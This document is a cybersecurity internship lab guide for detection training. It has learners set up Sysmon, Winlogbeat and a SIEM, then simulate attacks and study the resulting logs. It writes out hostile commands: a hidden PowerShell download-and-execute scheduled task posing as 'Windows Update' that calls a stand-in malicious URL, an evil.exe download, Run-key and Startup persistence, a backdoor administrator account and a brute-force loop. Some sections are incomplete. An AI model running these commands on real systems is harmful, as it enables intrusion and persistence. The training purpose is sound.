Phase 1 Internship Program – Step-by-Step Guide

Objective of Phase 1

To introduce candidates to real-time cybersecurity threat detection use cases through hands-on simulations and
tool-based analysis.

Step 1: Setup Your Environment

1. Install VirtualBox / VMware + Kali Linux (or use any pre-configured VM).
2. Install ELK Stack (Elasticsearch, Logstash, Kibana) or Wazuh SIEM.
3. Configure Sysmon + Winlogbeat on Windows VM (for endpoint logging).
4. Prepare GitHub Repo:
o Create a GitHub repo named cyber-intern-phase-1.
o Maintain folders like /logs, /reports, /screenshots, /hints.

---------------------------------------------------------------------------------------------------------------

HINTS:

1. Brute Force Detection

Hint:
Look into authentication logs like /var/log/auth.log or Windows Event ID 4625. Focus on patterns where
multiple failed attempts are made from the same IP in a short time.

Tip: Think of Hydra or Burp Suite brute force modules.

2. Malware Detection

Hint:
Use VirusTotal or any.run to analyze suspicious files. In your SIEM, observe unexpected processes, registry
changes, or connections to unknown IPs.

Tip: Try simulating a malware dropper script with curl or Invoke-WebRequest and execute in a lab.

3. Data Exfiltration Detection

Hint:
Watch for large outbound traffic on non-standard ports. Analyze network logs, and use Wireshark to capture
exfiltration attempts.

Tip: Use netcat to simulate file transfer over HTTP, FTP, or DNS.

4. Suspicious Network Activity

Hint:
Use tools like Wireshark or tcpdump to monitor abnormal traffic patterns. Look for port scanning, repeated
connection attempts, or odd DNS queries.

Tip: Try nmap -sS and watch how it shows up in logs.

5. Phishing Email Detection

Hint:
Look for email headers, links to shortened or weird domains, and attachments with .exe, .js, or
.vbs extensions. Use email gateways or SIEM to flag these.

Tip: Use the open-source tool “GoPhish” to simulate phishing in your lab.

6. Unauthorized Access Attempt

Hint:
Audit logs are your best friend. Search for login attempts outside office hours, use of disabled accounts, or
access from unusual geolocations.

Tip: Use failed logon Event ID 4625 and success 4624 to compare patterns.

7. Suspicious File Download

Hint:
Use PowerShell logging (ModuleLogging, ScriptBlockLogging) to catch scripts like:

Invoke-WebRequest -Uri "http://malicious-url" -OutFile "evil.exe"

Tip: Enable Sysmon to detect ProcessCreate + network connections.

8. Privilege Escalation Attempt

Hint:
Check for creation of new admin users, or modifications to registry keys, services, or token
impersonation attempts.

Tip: Tools like whoami /priv, accesschk, and winPEAS reveal escalation paths.

9. Lateral Movement Detection

Hint:
Monitor SMB, WMI, RDP, or PsExec traffic between internal systems. Use Sysmon Event ID
3 and Windows Event ID 4624 to trace logons.

Tip: Try moving laterally using CrackMapExec or wmiexec from Impacket.

10. Command and Control (C2) Traffic Detection

Hint:
Detect beaconing patterns, especially regular intervals of outbound traffic. Look into PowerShell
Empire, Cobalt Strike, or DNS-based C2.

Tip: Set up a mock listener using Netcat or Empire and track outbound packets.

Pro Tip for All Challenges:

"If you're stuck, think like a hacker. Then, think how you'd detect it."
STEP 1 Approach

1. Install a Virtualization Tool

A virtualization tool allows you to run operating systems like Kali Linux or Windows in a sandboxed virtual
environment.

Recommended Options:

• Oracle VirtualBox (Free and open-source)

o Download: https://www.virtualbox.org
• VMware Workstation Player (Free for personal use)
o Download: https://www.vmware.com/products/workstation-player.html

Install Steps (VirtualBox Example):

• Download the installer for your OS (Windows/Linux/Mac).

• Run the installer with default options.
• Reboot your system (if prompted).

2. Download and Install Kali Linux or Ubuntu VM

Option 1: Kali Linux (for attack simulations)

• Download: https://www.kali.org/get-kali/#kali-virtual-machines
• Import .ova file into VirtualBox.
• Set CPU: 2 cores, RAM: 4 GB recommended.

Option 2: Ubuntu/Debian (for log collection/monitoring)

3. Install Windows 10 Virtual Machine (Target Machine)

• Use Microsoft's free Windows 10 VM

• This machine is used to simulate endpoint activity like brute force, malware, USB insertions.

Important Settings:

• Enable Sysmon and Winlogbeat (covered later).

• Disable Defender or Antivirus temporarily for testing malware detection.

4. Setup SIEM Platform (ELK or Wazuh)

Option 1: Wazuh (Recommended for beginners)

• Install guide: https://documentation.wazuh.com

• Wazuh includes:
o ElasticSearch for storing logs
o Kibana for visualizing
o Wazuh Manager for security alerts

Option 2: ELK Stack (Manual setup)

• Install:
o Elasticsearch
o Logstash
o Kibana
• Configure:
o Winlogbeat to send logs from Windows VM to Logstash
o Sysmon to generate detailed logs

5. Install Sysmon on Windows VM

Sysmon is a Windows system monitor that logs detailed events like process creations, network connections, and
file modifications.
Install:

Download from: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Command:

sysmon -accepteula -i sysmonconfig.xml

Use a community config like SwiftOnSecurity/sysmon-config

6. Install & Configure Winlogbeat

Winlogbeat ships logs from Windows to your ELK or Wazuh instance.

Steps:

• Download Winlogbeat for Windows.

• Configure winlogbeat.yml:

output.elasticsearch:

hosts: ["http://your-elk-ip:9200"]

• Start the Winlogbeat service.

7. Enable Windows Security Event Logging

Ensure important logs are enabled:

• Audit logon events

• Audit object access
• Audit process creation

Use Local Group Policy Editor:

Run → gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies →
Audit Policy

8. Create a GitHub Repository for Submissions

Name: cyber-intern-phase-1

Structure:

/logs/

/screenshots/

/reports/

/hints/

README.md

Push:

• Screenshots of setup
• Config files
• Logs
• Summary notes

End of Step 1 Checklist

 Item Status
VirtualBox/VMware Installed
Kali Linux VM ready
Windows 10 VM ready
Sysmon & Winlogbeat installed
SIEM (Wazuh/ELK) setup complete
GitHub repo created
Step 2: Understand the 10 Hints (Scenarios)

Objective of Step 2

To create realistic security events on a Windows system so that:

• Logs are captured by Sysmon and Winlogbeat

• Data flows into the SIEM (like Wazuh, ELK, or Graylog)
• You learn how threats are reflected in logs, which is essential for detection engineering and
investigations.

Components Involved

Component Purpose
Windows VM Host to perform malicious/suspicious activities
Sysmon Collects deep system-level events
Winlogbeat Forwards Windows event logs to the SIEM
SIEM (Wazuh/ELK) Centralized log storage and analysis

Why Simulate Events?

Cybersecurity teams rely on logs to:

• Detect attacks (brute force, malware, etc.)

• Monitor user and system behavior
• Investigate incidents post-breach

Simulating events = learning how attacks leave a trail in logs.

Types of Events to Simulate

Type Attack Simulation Purpose

Authentication Brute Force Observe login failures
Execution PowerShell, .bat file See how scripts run
Persistence Startup folder, registry Understand privilege misuse
Network Web request to fake sites Learn outbound traffic monitoring
Privilege Abuse Add admin user Detect unauthorized user creation

What Gets Logged?

Activity Event IDs / Log Types

Failed Login Windows 4625
PowerShell Execution Sysmon 1, PowerShell logs
File Creation/Execution Sysmon 11, 1
Network Connection Sysmon 3
Registry Modification Sysmon 13
Task Scheduler Abuse Windows 4698
USB Insertion System logs (Removable Drive Detection)

Event Categories in Logs

 Category Example
Authentication Failed login, session logout
Process Creation EXE or script execution
Network Activity IP connections, DNS resolution
File Operations Create, modify, delete files
Registry Persistence mechanisms

Sample Use Case

👨💻 Simulating Brute Force

for ($i=1; $i -le 10; $i++) {

net use \\127.0.0.1\IPC$ /user:FakeUser WrongPassword

Logs to expect:

• Windows 4625 (Failed Login)

• Event shows time, username, IP, and failure reason

Tools Used in Step 2

Tool Role
PowerShell Simulate commands/attacks
Sysmon Capture deep telemetry
Winlogbeat Send logs to Elasticsearch/Wazuh
Event Viewer Manually view Windows logs

Best Practices

• Document your steps: commands used, expected output, actual logs

• Take screenshots of Event Viewer or SIEM dashboards
• Push updates to GitHub daily
• Avoid real malware or payloads — simulations only

Each hint relates to a real-world use case:

• Brute Force
• Malware
• Data Exfiltration
• Suspicious Network Activity
• USB Activity
• etc.

Purpose of Hints:
To simulate attacker behavior and analyze logs using SIEM tools.

Outcome of Step 2

By the end of this step, you will:

• Understand how different attacks generate specific logs

• Know which tools capture which log types
• Be ready to write detections in the next step (Step 3)
STEP 2 Approach

Step 2: Simulate Events & Generate Logs (Detailed Guide)

Objective of This Step

To simulate realistic cybersecurity scenarios on your Windows VM so that logs can be generated, collected
by Winlogbeat, and analyzed in your SIEM (Wazuh or ELK). These logs will form the foundation for detections
and investigations in future steps.

Target Machine: Windows 10 VM

Make sure:

• Sysmon is running
• Winlogbeat is properly configured and started
• Logs are flowing to your SIEM

Simulated Security Scenarios

You will simulate 10 different activities to generate rich event logs. Below are instructions for each scenario.

Hint 1: Brute Force Login Attempts

What to do:

• Create a fake RDP login attempt using the following:

for ($i=1; $i -le 10; $i++) {

net use \\127.0.0.1\IPC$ /user:FakeUser WrongPassword
}

What gets logged:

• Windows Event ID 4625 (Failed Logon)

• Sysmon may capture process and network-related activity

Hint 2: Suspicious PowerShell Usage

What to do:
Run the following:

powershell -enc
UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcwBtAG8AYwBoAC4AZQB4AGUAIgA=

(This base64 runs Start-Process "smoch.exe")

What gets logged:

• Sysmon Event ID 1 (Process Create)

• PowerShell transcript logs

Hint 3: USB Drive Insertion

What to do:

• Insert a USB drive into your Windows VM (or simulate via VBox).
• Copy and execute a file from it.

What gets logged:

 • Sysmon: File creation and process execution
• Windows: Removable drive detection

Hint 4: Malware Execution Simulation

What to do:

• Create a .bat file with dummy commands:

@echo off
echo Simulating malware...
ping 8.8.8.8 -n 10

• Run it from Downloads/ or Temp/

What gets logged:

• File execution (Sysmon)

• Network connections

Hint 5: Registry Modification

What to do:

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "evil" -Value

"C:\temp\malware.exe"

What gets logged:

• Registry key modification (Sysmon Event ID 13)

📌 Hint 6: Suspicious Network Connection

What to do:

Invoke-WebRequest -Uri http://testphp.vulnweb.com

What gets logged:

• Sysmon Event ID 3 (Network Connection)

• Destination IP in the logs

Hint 7: Fileless Attack Simulation

What to do:

What gets logged:

• PowerShell command logs

• Sysmon process logs

Hint 8: Create Suspicious Scheduled Task

What to do:

schtasks /create /tn "Windows Update" /tr "powershell.exe -nop -w hidden -c IEX(New-Object
Net.WebClient).DownloadString('http://malicious-url')" /sc minute /mo 1
What gets logged:

• Windows Event ID 4698 (Task creation)

• Sysmon: Process chain

Hint 9: Simulate Persistence

What to do:

• Place a file in the Startup folder:

copy evil.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\"

What gets logged:

• File copy (Sysmon ID 11)

• Process execution on reboot

Hint 10: Create a Local User (Privilege Abuse)

What to do:

net user attacker P@ssword123 /add

net localgroup administrators attacker /add

What gets logged:

• Event ID 4720 (User Creation)

• Event ID 4732 (Group membership change)

Validation: Confirm Logs are Reaching SIEM

1. Go to Kibana/Wazuh dashboard.
2. Check:
o Count of logs (timestamp, host)
o Sysmon logs
o Winlogbeat indices
o Search using:

event.code:"1" OR event.code:"4625"

Documentation & GitHub Push

Folder Structure:

/hints/
└── hint1_brute_force.png
└── hint2_ps_encoded_command.png
...
/logs/
└── event_logs.json
/screenshots/
└── dashboard_kibana.png

Push updates daily with proper commits like:

git commit -m "Completed Hint 1: Brute Force Attempt"

Step 3: Simulate Attacks / Behaviors - Analyze Logs & Understand Patterns

Objective of Step 3

The goal of this step is to analyze the logs you generated in Step 2 to:

• Identify patterns and indicators of malicious or suspicious activity

• Understand how different attack behaviors appear in logs
• Prepare yourself to build detection rules in Step 4

Why Log Analysis Is Critical

Logs are the evidence trail left by users, systems, and attackers.

Security depends on:

• Spotting deviations from normal activity

• Recognizing known indicators (e.g., failed login bursts)
• Connecting multiple log entries to form a threat timeline

Key Skills You'll Learn

Skill Explanation
Pattern Recognition Repeated failed logins, odd IP access
Correlation Linking process creation to file drops
TTP Mapping Aligning behavior with MITRE ATT&CK
Noise Filtering Separating normal from suspicious activity

Common Log Sources to Analyze

Log Type Events to Look For

Windows Security
Event IDs 4624 (Login), 4625 (Failed Login), 4670 (Permissions Change)
Log
Event ID 1 (Process Create), 3 (Network Connection), 11 (File Create), 13 (Registry
Sysmon Logs
Change)
Winlogbeat Output Forwarded logs to ELK/Wazuh
SIEM Dashboards Visual summaries of above logs

Sample Attack Pattern

Simulated Brute Force

You simulated repeated failed logins. Now analyze:

Field Value
Event ID 4625
Target Username Admin
Failure Reason Unknown user name or bad password
Source IP 127.0.0.1
Count > 10 in short time

What This Means:

This pattern indicates a brute force attack attempt. It could be automated or targeted.
How to Approach Log Analysis

Tools You Can Use:

• Event Viewer (on Windows)

• Kibana (if using ELK stack)
• Wazuh Dashboard
• Graylog Web Interface
• Notepad++ or Excel (for CSV exported logs)

Steps to Analyze:

1. Open logs using SIEM or local viewer

2. Filter by event type (e.g., 4625)
3. Look for repetition or anomalies
4. Correlate across logs (e.g., a login followed by process launch)
5. Map to attack types (see MITRE ATT&CK)

Real-world Detection Use Cases

Use Case Log Pattern

Brute Force Many 4625 logins in < 1 min
Malware Execution Sysmon Event ID 1 + file drop (ID 11)
Suspicious Network Activity Event ID 3 to rare domain
Persistence Registry change (Sysmon 13), new scheduled task
Privilege Escalation User added to admin group (Event ID 4732)

Tips for Good Analysis

• Use filters/search queries in SIEM to narrow down noise

• Document what you found: What log, what timestamp, what was unusual
• Compare against normal behavior (e.g., which users usually log in)

Outcome of Step 3

By the end of Step 3, you should:

• Be comfortable reading log files

• Know how different attacks look in logs
• Be ready to write detection rules to alert on such patterns (Step 4)

Use tools to simulate:

• Brute Force – Run hydra or ncrack on SSH/RDP.

• Malware Execution – Use test samples from sites like theZoo (safe, non-malicious).
• Data Exfiltration – Send large files to remote IPs.
• Suspicious Network Activity – Connect to non-standard ports or generate fake C2 traffic.
• USB Activity – Insert a USB and monitor Event IDs.

Step 4: Capture and Analyze Logs

1. Enable event logging on the test VM.

2. Use Sysmon + Winlogbeat to forward logs to ELK/Wazuh.
3. Analyze patterns like:
o Failed login attempts
o Unusual process execution
o Suspicious DNS queries
o Outbound traffic spikes

Step 5: Documentation Practice

Each student must:

• Take screenshots of simulation

• Describe:
o What they did
o What they observed in the logs
o How SIEM flagged the event (if configured)
• Add to GitHub:
o hint01_brute_force.md
o hint02_malware_exec.md
o etc.

Step 6: Upload to GitHub Weekly

Structure:

Step 7: Completion Criteria

• Must complete at least 8 out of 10 hints.

• Must push structured and clear documentation.
• Only then eligible for Phase 2 access.

Troubleshooting Tips

• Use online sandboxes like TryHackMe or HackTheBox if you don’t have setup.
• Refer to MITRE ATT&CK for tactics and techniques.
• YouTube: Search for “how to simulate brute force with hydra” etc.